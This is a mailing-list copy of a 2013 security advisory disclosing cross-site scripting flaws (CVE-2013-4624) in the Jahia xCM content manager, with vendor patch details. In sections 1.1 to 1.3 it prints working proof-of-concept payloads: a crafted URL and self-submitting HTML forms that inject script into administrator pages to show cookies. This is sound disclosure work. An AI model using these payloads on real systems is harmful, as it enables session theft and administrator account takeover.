'Multiple XSS Vulnerabilities in Jahia xCM'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    Multiple XSS Vulnerabilities in Jahia xCM
From:       advisory () htbridge ! com
Date:       2013-07-31 10:43:52
Message-ID: 20130731104352.5668B2C4C0CF () htbridge ! ch
[Download RAW message or body]

Advisory ID: HTB23159
Product: Jahia xCM 
Vendor: Jahia Solutions Group SA 
Vulnerable Version(s): 6.6.1.0 r43343 and probably prior
Tested Version: 6.6.1.0 r43343
Vendor Notification: June 5, 2013 
Vendor Patch: July 17, 2013 
Public Disclosure: July 31, 2013 
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2013-4624
Risk Level: Low 
CVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( \
https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------


Advisory Details:

High-Tech Bridge Security Research Lab discovered multiple XSS vulnerabilities in \
Jahia xCM, which can be exploited to perform cross-site scripting attacks against \
administrator of vulnerable application.


1) Multiple Cross-Site Scripting (XSS) Vulnerabilites in Jahia xCM: CVE-2013-4624

1.1 The vulnerability exists due to insufficient sanitisation of user-supplied data \
in "site" HTTP GET parameter passed to "/engines/manager.jsp" script. A remote \
attacker can trick a logged-in administrator to open a specially crafted link and \
execute arbitrary HTML and script code in  browser in context of the vulnerable \
website.

The exploitation example below uses JavaScript 'alert()' function to display \
administrator's cookies:

http://[host]/engines/manager.jsp?conf=repositoryexplorer&site=%3C/script%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E



1.2 The vulnerability exists due to insufficient filtration of user-supplied data in \
"searchString" HTTP POST parameter passed to "/administration/" URI when "do=users" \
and "sub=search". A remote attacker can trick a logged-in administrator to open a \
specially crafted link and execute arbitrary HTML and script code in browser in \
context of the vulnerable website.

The exploitation example below uses JavaScript 'alert()' function to display \
administrator's cookies:


<form action="http://[host]/administration/?do=users&sub=search" method="post" \
name="main"> <input type="hidden" name="searchString"   \
value="'><script>alert(document.cookie);</script>"> <input type="submit" id="btn">
</form>
<script>
document.main.submit();
</script>



1.3 The vulnerability exists due to insufficient sanitisation of user-supplied data \
in "username", "manage-user-property#j:firstName", "manage-user-property#j:lastName", \
"manage-user-property#j:email" and "manage-user-property#j:organization" HTTP POST \
parameters passed to "/administration/" URI when "do=users" and "sub=processCreate". \
A remote attacker can trick a logged-in administrator to open a specially crafted \
link and execute arbitrary HTML and script code in browser in context of the \
vulnerable website.

The exploitation example below uses JavaScript 'alert()' function to display \
administrator's cookies:


<form action="http://[host]/administration/?do=users&sub=processCreate" method="post" \
name="main"> <input type="hidden" name="username"                            \
value="'><script>alert(document.cookie);</script>"> <input type="hidden" \
name="manage-user-property#j:firstName"    \
value="'><script>alert(document.cookie);</script>"> <input type="hidden" \
name="manage-user-property#j:lastName"     \
value="'><script>alert(document.cookie);</script>"> <input type="hidden" \
name="manage-user-property#j:email"        \
value="'><script>alert(document.cookie);</script>"> <input type="hidden" \
name="manage-user-property#j:organization" \
value="'><script>alert(document.cookie);</script>"> <input type="hidden" \
name="actionType"   value='save'> <input type="submit" id="btn">
</form>
<script>
document.main.submit();
</script>


-----------------------------------------------------------------------------------------------


Solution:

Apply hotfix 7, that is available to all customers:
https://www.jahia.com/fr/home/support/customers-extranet/enterprise-jahia-downloads/jahia-xcm---version-66.html


-----------------------------------------------------------------------------------------------


References:

[1] High-Tech Bridge Advisory HTB23159 - https://www.htbridge.com/advisory/HTB23159 - \
Multiple XSS Vulnerabilities in Jahia xCM. [2] Jahia xCM - http://www.jahia.com - \
Jahia xCM is the unified interface to access, personalize and manage best of breed \
WCM, portal and document management features. [3] Common Vulnerabilities and \
Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public \
use, CVE Ž is a dictionary of publicly known information security vulnerabilities and \
exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to \
developers and security practitioners, CWE is a formal list of software weakness \
types. 

-----------------------------------------------------------------------------------------------


Disclaimer: The information provided in this Advisory is provided "as is" and without \
any warranty of any kind. Details of this Advisory may be updated in order to provide \
as accurate information as possible. The latest version of the Advisory is available \
on web page [1] in the References.


[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic